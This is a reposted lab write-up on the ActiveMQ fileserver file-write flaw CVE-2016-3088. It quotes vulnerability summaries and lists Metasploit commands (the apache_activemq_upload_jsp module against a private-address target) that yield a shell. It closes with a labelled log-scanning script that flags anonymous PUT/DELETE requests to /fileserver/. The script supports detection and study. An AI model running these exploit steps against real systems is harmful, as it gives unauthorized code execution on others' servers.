
ActiveMQ--CVE-2016-3088

2022-06-25 19:09:00 B6 capsule

  

cve-2016-3088 | LOFTER - logs related to cve-2016-3088: http://www.lofter.com/tag/CVE-2016-3088

ActiveMQ arbitrary file write vulnerability (CVE-2016-3088) - skr...'s blog, CSDN Blog. ActiveMQ introduction: Apache ActiveMQ is an open source message middleware developed by the Apache Software Foundation. It supports Java Message Service, clustering, the Spring Framework, etc. What it is: message-oriented middleware. Vulnerability introduction: ActiveMQ's web console is divided into three applications, admin, api and fileserver, among which admin is the admin page, ap... https://blog.csdn.net/weixin_44311721/article/details/98085706

ActiveMQ arbitrary file write vulnerability (CVE-2016-3088) - swordheart's blog, CSDN Blog. Vulnerability profile: the ActiveMQ web console is divided into three applications, admin, api and fileserver, where admin is the administrator page, api is the interface, and fileserver is the interface for storing files; admin and api require login to use, fileserver does not. fileserver is a RESTful API interface. Files stored in it can be read and written through HTTP requests such as GET, PUT and DELETE. It was designed to make up for the fact that message queue operations cannot transmit and store binary files, but it later turned out that its utilization rate is not high and file operations are prone to vulnerabilities, so ... https://blog.csdn.net/jd_cx/article/details/122553619

Set up SSH key login | Novice tutorial. We usually use SSH clients such as PuTTY to manage Linux servers remotely. However, with ordinary password login, the password is easily brute-forced. Therefore, we generally set SSH to a port other than the default 22, or disable root account login. Actually, there is a safer way that also lets you log in remotely with the root account safely: logging in with a key. The principle of key-based login is: use a key generator to make a pair of keys, a public key and a private key. Add the public key to an account on the server .. https://www.runoob.com/w3cnote/set-ssh-login-key.html

 

Start the environment

Following reference link 1, there is no absolute path

 

Try uploading an SSH public key

Finally, exploitation with msf succeeded

search CVE-2016-3088 (search for exploit modules)
use exploit/multi/http/apache_activemq_upload_jsp (use the module)
set rhost 192.168.1.103 (set the target)
exploit (execute)
Shell obtained successfully
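
The vulnerability summaries quoted above note that fileserver accepts PUT and DELETE without login. The following detection check is an added example, not code from the original post or from the ActiveMQ project: it scans web access logs for modifying requests under /fileserver/. It assumes Common Log Format access logs are available from the broker's web server or a reverse proxy in front of it; the function names and sample lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Common Log Format: host ident user [time] "METHOD path proto" status size
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
READ_ONLY = {"GET", "HEAD", "OPTIONS"}  # anything else modifies stored files

def fileserver_writes(lines):
    """Return parsed requests that modify content under /fileserver/."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log line; skip rather than guess
        # Decode percent-encoding and drop the query string before matching.
        path = unquote(m["path"].split("?", 1)[0]).lower()
        if path.startswith("/fileserver/") and m["method"] not in READ_ONLY:
            hits.append(m.groupdict())
    return hits

def summarize(hits):
    """Group hits per client; a 2xx status means the server accepted the write."""
    per_host = defaultdict(lambda: {"requests": 0, "accepted": 0, "anonymous": 0})
    for h in hits:
        stats = per_host[h["host"]]
        stats["requests"] += 1
        stats["accepted"] += h["status"].startswith("2")
        stats["anonymous"] += h["user"] == "-"  # "-" means no authenticated user
    return dict(per_host)

# Constructed sample lines (documentation addresses, not from a real server).
SAMPLE = [
    '192.0.2.10 - - [25/Jun/2022:19:01:02 +0000] "GET /admin/ HTTP/1.1" 401 0',
    '192.0.2.10 - - [25/Jun/2022:19:01:05 +0000] "PUT /fileserver/a.txt HTTP/1.1" 204 0',
    '192.0.2.10 - - [25/Jun/2022:19:01:09 +0000] "DELETE /fileserver/a.txt HTTP/1.1" 204 0',
    '198.51.100.7 - admin [25/Jun/2022:19:02:00 +0000] "GET /fileserver/readme.txt HTTP/1.1" 200 12',
    '198.51.100.7 - - [25/Jun/2022:19:03:00 +0000] "PUT /fileserver/x.bin HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for host, stats in summarize(fileserver_writes(SAMPLE)).items():
        print(host, stats)
```

Accepted anonymous writes are the entries to triage first; rejected ones still show that the endpoint is reachable and being probed.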


Copyright notice
This article was written by [B6 capsule]. Please include the original link when reposting. Thanks.
https://yzsam.com/2022/02/202202190521319784.html